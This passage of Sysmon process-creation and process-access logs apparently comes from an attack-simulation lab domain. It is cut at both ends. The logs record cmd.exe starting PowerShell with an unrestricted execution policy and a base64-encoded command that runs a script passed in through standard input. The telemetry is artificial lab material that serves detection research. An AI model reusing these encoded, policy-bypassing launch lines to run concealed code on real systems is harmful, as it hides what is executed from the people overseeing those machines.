UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11C4-5F25-0000-002093D80600}\r\nLogonId: 0x6D893\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11C4-5F25-0000-001098DB0600}\r\nParentProcessId: 1348\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.460","ProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001067DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11C4-5F25-0000-002093D80600}","LogonId":"0x6d893","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001098DB0600}","ParentProcessId":"1348","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4967,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001098DB0600}\r\nSourceProcessId: 1348\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001067DC0600}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001098DB0600}","SourceProcessId":"1348","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001067DC0600}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4968,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001067DC0600}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001067DC0600}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4969,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYST